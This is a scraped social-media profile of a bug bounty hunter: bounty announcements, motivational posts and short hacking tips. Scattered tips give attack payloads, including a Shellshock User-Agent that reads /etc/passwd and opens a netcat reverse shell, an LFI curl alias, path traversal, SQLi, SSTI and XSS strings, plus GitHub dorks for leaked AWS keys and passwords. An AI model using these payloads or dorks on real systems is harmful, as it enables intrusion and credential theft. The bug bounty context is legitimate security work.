Ahsan Khan Profile Banner
Ahsan Khan Profile
Ahsan Khan

@hunter0x7

Followers
33,045
Following
1,337
Media
115
Statuses
907

[Hacker + lover of bash] I Don't know how to hack but i know how to pwnd!

Joined January 2019
Don't wanna be here? Send us removal request.
Explore trending content on Musk Viewer
Pinned Tweet
@hunter0x7
Ahsan Khan
4 years
My spotlight with bugcrowd 🤗🤗
@Bugcrowd
bugcrowd
4 years
While he hits some pretty big bounties, you might be surprised how @hunter0x7 got started in bug hunting. Join us for this researcher spotlight and down to earth chat with Ahsan Khan! #ItTakesACrowd
Tweet media one
25
35
299
31
23
495
@hunter0x7
Ahsan Khan
2 years
IDOR Checklist
Tweet media one
127
927
3K
@hunter0x7
Ahsan Khan
4 years
Bounty 10,000$
Tweet media one
63
406
3K
@hunter0x7
Ahsan Khan
4 years
How it started How it’s going
Tweet media one
Tweet media two
75
150
2K
@hunter0x7
Ahsan Khan
4 years
GET /admin HTTP/1.1 Host: ... Access is denied GET /test HTTP/1.1 Host: X-Original-URL: /admin HTTP/1.1 200 OK
23
529
2K
@hunter0x7
Ahsan Khan
4 years
10k 🤗
Tweet media one
63
49
2K
@hunter0x7
Ahsan Khan
4 years
Github org:Target "bucket_name" org:Target "aws_access_key" org:Target "aws_secret_key" org:Target "S3_BUCKET" org:Target "S3_ACCESS_KEY_ID" org:Target "S3_SECRET_ACCESS_KEY" org:Target "S3_ENDPOINT" org:Target "AWS_ACCESS_KEY_ID" org:Target "list_aws_accounts"
18
584
2K
@hunter0x7
Ahsan Khan
4 years
Tweet media one
23
549
2K
@hunter0x7
Ahsan Khan
7 months
3000$
Tweet media one
25
227
1K
@hunter0x7
Ahsan Khan
4 years
site: "company" site: "company" site: "company" site: "company" site: "company" site: "company" site: "company" 1/3
22
474
1K
@hunter0x7
Ahsan Khan
2 years
~IDOR Worked for me 100 times
Tweet media one
33
281
1K
@hunter0x7
Ahsan Khan
4 years
~Pwn 1. Create an account email @burp_collab * 2. Forgot password 3. Received requests from internal server + SMTP connection details 4. Got Internal headers + origin IP 5. = (403) 6. = (Headers + Origin IP = pwn) Pwning isn't easy~
26
419
1K
@hunter0x7
Ahsan Khan
2 years
Replaced: Netflix with Recon (Learning) Youtube with Tryhackme Weekends with Hunting Instagram with Books Negativity with Love
21
151
1K
@hunter0x7
Ahsan Khan
2 years
~Django Admin Panel Pwn
Tweet media one
46
247
1K
@hunter0x7
Ahsan Khan
4 years
Tweet media one
24
376
1K
@hunter0x7
Ahsan Khan
3 years
~Pwning 1. Gau + Waybackurls = Collected endpoints 2. Found 3. Bypassed using sqli ('1 or 1 =' 1) 4. RCE through Node.js deserialization Tip: RECON is everything ❤️
21
289
1K
@hunter0x7
Ahsan Khan
1 year
CSRF Checklist
Tweet media one
22
320
986
@hunter0x7
Ahsan Khan
4 years
finding endpoints: cat js | grep -o -E "(https?://)?/?[{}a-z0-9A-Z_\.-]{2,}/[{}/a-z0-9A-Z_\.-]+"
11
272
978
@hunter0x7
Ahsan Khan
4 years
Tweet media one
23
365
969
@hunter0x7
Ahsan Khan
4 years
* You won't do it * You are useless * You are nothing * You can't * You are wasting Time * You are poor And now their yearly income is my pocket money so fuck you
48
89
938
@hunter0x7
Ahsan Khan
2 years
~Pwning 1. Recon = Found log file: web/path/wget-log 2. Found Server IP in the logs file 3. Tested Server IP & Found .git dir: wget -m -I .git web/.git/ 4. git status & found backup zip file 5. While reading files found: app/file.php disclosing SSH root Credentials 6. RCE
30
223
933
@hunter0x7
Ahsan Khan
4 years
3rd 10k 🤗
Tweet media one
56
26
906
@hunter0x7
Ahsan Khan
4 years
Github: Org:org_name "password"
Tweet media one
17
121
901
@hunter0x7
Ahsan Khan
4 years
Selected a program; 1st weak = 0 bugs 2nd weak = 2+ bugs 3rd weak = 50+ bugs 4th weak = 100% traiged Rewarded for 50+ bugs Dig deep until you find 💎
40
71
819
@hunter0x7
Ahsan Khan
3 years
Tweet media one
12
228
821
@hunter0x7
Ahsan Khan
4 years
Another 10k 🤗
Tweet media one
31
24
804
@hunter0x7
Ahsan Khan
4 years
Test on CGI (cgi-bin) User-Agent: () { :;}; echo $(</etc/passwd) () { :;}; /usr/bin/nc ip 1337 -e /bin/bash
11
271
786
@hunter0x7
Ahsan Khan
2 years
Pwning Admin Panels (Host header poisoning) POST /admin/forgot_password HTTP/1.1 Host: web..com"><img src="Blind XSS Here">
19
258
768
@hunter0x7
Ahsan Khan
4 years
response = nothing ~ response = source
19
204
754
@hunter0x7
Ahsan Khan
4 years
Stick to the same program and pwn everything 🔥
Tweet media one
37
27
713
@hunter0x7
Ahsan Khan
3 years
/../../c:/windows/system32/drivers/etc/hosts
Tweet media one
26
133
698
@hunter0x7
Ahsan Khan
4 years
alias lfi="curl -H 'Accept: ../../../../../../../../../etc/passwd{{' "
7
169
695
@hunter0x7
Ahsan Khan
2 years
Bypassed SSTI Again Payload: {{%% if 'ahsan' == 'ahsan' %%}} a {{%% endif %%}} Bounty: 1000$
@hunter0x7
Ahsan Khan
2 years
~Django Admin Panel Pwn
Tweet media one
46
247
1K
14
188
683
@hunter0x7
Ahsan Khan
4 years
I earned $21,875 for my submissions on @bugcrowd #ItTakesACrowd
40
14
658
@hunter0x7
Ahsan Khan
4 years
Selected a program; 1st attempt = 3.5k$ After few months 2nd attempt = 7.5k$ After few months (Bypassed the fixes + New feature bugs) 3rd attempt = 10k$ Come back with 🔥
13
28
600
@hunter0x7
Ahsan Khan
4 years
Tweet media one
10
231
573
@hunter0x7
Ahsan Khan
4 years
Found secret tokens but not sure about it Solution:
7
163
518
@hunter0x7
Ahsan Khan
3 years
If you can't pwn admin panels then pwn admin user ❤️ (P1)
Tweet media one
18
20
511
@hunter0x7
Ahsan Khan
4 years
30k done from last program 🤗🤗🤗🤗 (Alhamdulillah)
Tweet media one
28
13
510
@hunter0x7
Ahsan Khan
4 years
~Dork site: "company"
Tweet media one
11
114
504
@hunter0x7
Ahsan Khan
4 years
you won't do it because you are weak in learning, Yes they are right that I am weak therefore I am working 110+ hours per week to improve this weakness
17
45
474
@hunter0x7
Ahsan Khan
4 years
xss : img{background-image:url('javascript:alert()')}
6
121
425
@hunter0x7
Ahsan Khan
4 years
Work hard for 10 years or work for the next 60 years!
13
50
412
@hunter0x7
Ahsan Khan
4 years
ok
Tweet media one
25
9
401
@hunter0x7
Ahsan Khan
3 years
Tweet media one
9
45
405
@hunter0x7
Ahsan Khan
3 years
~Github org:company "firebase"
6
75
401
@hunter0x7
Ahsan Khan
4 years
13
88
399
@hunter0x7
Ahsan Khan
4 years
Admin Pwn (Stories) 1. Found panel 2. Playing with GitHub for 2 days found a sandbox credentials 3. Used the same credentials on the panel and 🔥 4. After digging found SQLi 5. It took 3 days to pwn this panel Pwning isn't easy ~
9
58
382
@hunter0x7
Ahsan Khan
4 years
Be creative and focus on functionality testing! (Attack the main functions of the site for which the site is made)
Tweet media one
13
29
379
@hunter0x7
Ahsan Khan
3 years
If you think it's WordPress cms and you cant pwn it then u are wrong
Tweet media one
13
19
378
@hunter0x7
Ahsan Khan
4 years
Tweet media one
22
6
370
@hunter0x7
Ahsan Khan
3 years
Admin Pwn~
Tweet media one
23
7
355
@hunter0x7
Ahsan Khan
9 months
~PII Disclosure
Tweet media one
13
60
363
@hunter0x7
Ahsan Khan
2 years
org:company ".git"
5
64
348
@hunter0x7
Ahsan Khan
2 months
~Pwn
Tweet media one
8
43
359
@hunter0x7
Ahsan Khan
4 years
~Dorker
9
110
332
@hunter0x7
Ahsan Khan
2 years
Found 0-day
15
3
328
@hunter0x7
Ahsan Khan
4 years
Don’t wait for the new invites
6
48
332
@hunter0x7
Ahsan Khan
4 years
Tweet media one
13
5
323
@hunter0x7
Ahsan Khan
4 years
I earned $5,120 for my submission on @bugcrowd #ItTakesACrowd
19
3
306
@hunter0x7
Ahsan Khan
4 years
I earned $3,000 for my submission on @bugcrowd #ItTakesACrowd
20
5
302
@hunter0x7
Ahsan Khan
3 years
Tweet media one
1
31
275
@hunter0x7
Ahsan Khan
3 years
When I don't have anything to do I do work When I get bored I do work When I get sad I do work
13
24
277
@hunter0x7
Ahsan Khan
3 years
Tweet media one
11
0
273
@hunter0x7
Ahsan Khan
4 years
site: "company" site: "company" site: "company" site: "company" site: "company" site: "company" site:*.atlassian.net "company" 3/3
1
83
265
@hunter0x7
Ahsan Khan
2 years
If duplicates hurt you remember that there are others out there who are not even trying & you are not one of them You are already making an effort, and that is something to be proud of. Duplicates shouldn't hurt you cz you are digging so keep digging until you win.
6
39
268
@hunter0x7
Ahsan Khan
4 years
Tweet media one
13
4
262
@hunter0x7
Ahsan Khan
3 years
When your admin pwn mode = ON
Tweet media one
17
16
255
@hunter0x7
Ahsan Khan
4 years
Tweet media one
16
4
252
@hunter0x7
Ahsan Khan
2 years
~Pwn
Tweet media one
9
48
254
@hunter0x7
Ahsan Khan
3 years
5
38
242
@hunter0x7
Ahsan Khan
4 years
5
51
243
@hunter0x7
Ahsan Khan
4 years
Tweet media one
10
14
238
@hunter0x7
Ahsan Khan
2 years
Great week it has been hunting with my bro @hishammir1 💪 #ItTakesACrowd #Bugcrowd
Tweet media one
13
10
235
@hunter0x7
Ahsan Khan
4 years
1
43
241
@hunter0x7
Ahsan Khan
3 years
Mindset
4
52
234
@hunter0x7
Ahsan Khan
3 years
It's been 16 hours & still working ❤️
12
3
224
@hunter0x7
Ahsan Khan
2 years
Tweet media one
13
33
215
@hunter0x7
Ahsan Khan
4 years
Tweet media one
11
0
206
@hunter0x7
Ahsan Khan
2 years
~Pwn Will be speaking at @InfoSecComm tomorrow so who’s waiting ♥️ Talk: Accessing Admin Panels
22
10
201
@hunter0x7
Ahsan Khan
3 years
What if I do live hacking (Pwning) on twitch
Yes
1754
No
130
43
8
195
@hunter0x7
Ahsan Khan
1 year
Love from bugcrowd ❤️‍🩹 @Bugcrowd
Tweet media one
Tweet media two
8
5
200
@hunter0x7
Ahsan Khan
3 years
@remonsec I see on ma left side there is no one to help and the right side which is full of failure and ma front a screen which is called future so buddy make yourself that much busy in the work so you dont have much time to think about to look on the left or right ♥️ good luck
5
28
190
@hunter0x7
Ahsan Khan
2 years
Worked 90+ Hours last week
18
1
195
@hunter0x7
Ahsan Khan
5 years
I earned $2,100 for my submission on @bugcrowd #ItTakesACrowd
Tweet media one
16
8
192
@hunter0x7
Ahsan Khan
2 years
~OK
Tweet media one
13
6
190
@hunter0x7
Ahsan Khan
2 years
Failed in 9th Failed in 10th Failed in 11th Failed in 12th Failed in 13th Failed in 14th Failed in 15th Still going (Studies) Failure is the path to success
7
9
179
@hunter0x7
Ahsan Khan
7 months
Lets report 100 submissions.
18
12
185
@hunter0x7
Ahsan Khan
4 years
Tweet media one
7
0
179
@hunter0x7
Ahsan Khan
4 years
site: "company" site: "company" site: "company" site: "company" site: "company" site: "company" site: "company" 2/3
0
47
177
@hunter0x7
Ahsan Khan
3 years
It's been 17 hours & still working
12
1
177
@hunter0x7
Ahsan Khan
7 months
Update no 3: Reported 15 submissions (total). Critical one: Used Js Miner & for finding sen* info in JS files. Found a JS file disclosing access token without any endpoint. (1/3)
@h4x0r_dz
H4x0r.DZ
2 years
Search for all leaked keys/secrets using one regex! regex: #BugBounty #bugbountytip
Tweet media one
96
747
2K
5
42
178
@hunter0x7
Ahsan Khan
2 years
Tweet media one
2
9
171
@hunter0x7
Ahsan Khan
3 years
I am gonna wait for ma time 😊
10
10
171
@hunter0x7
Ahsan Khan
4 years
"company" inurl:gitlab "company"
3
41
162
@hunter0x7
Ahsan Khan
5 years
Tweet media one
13
0
151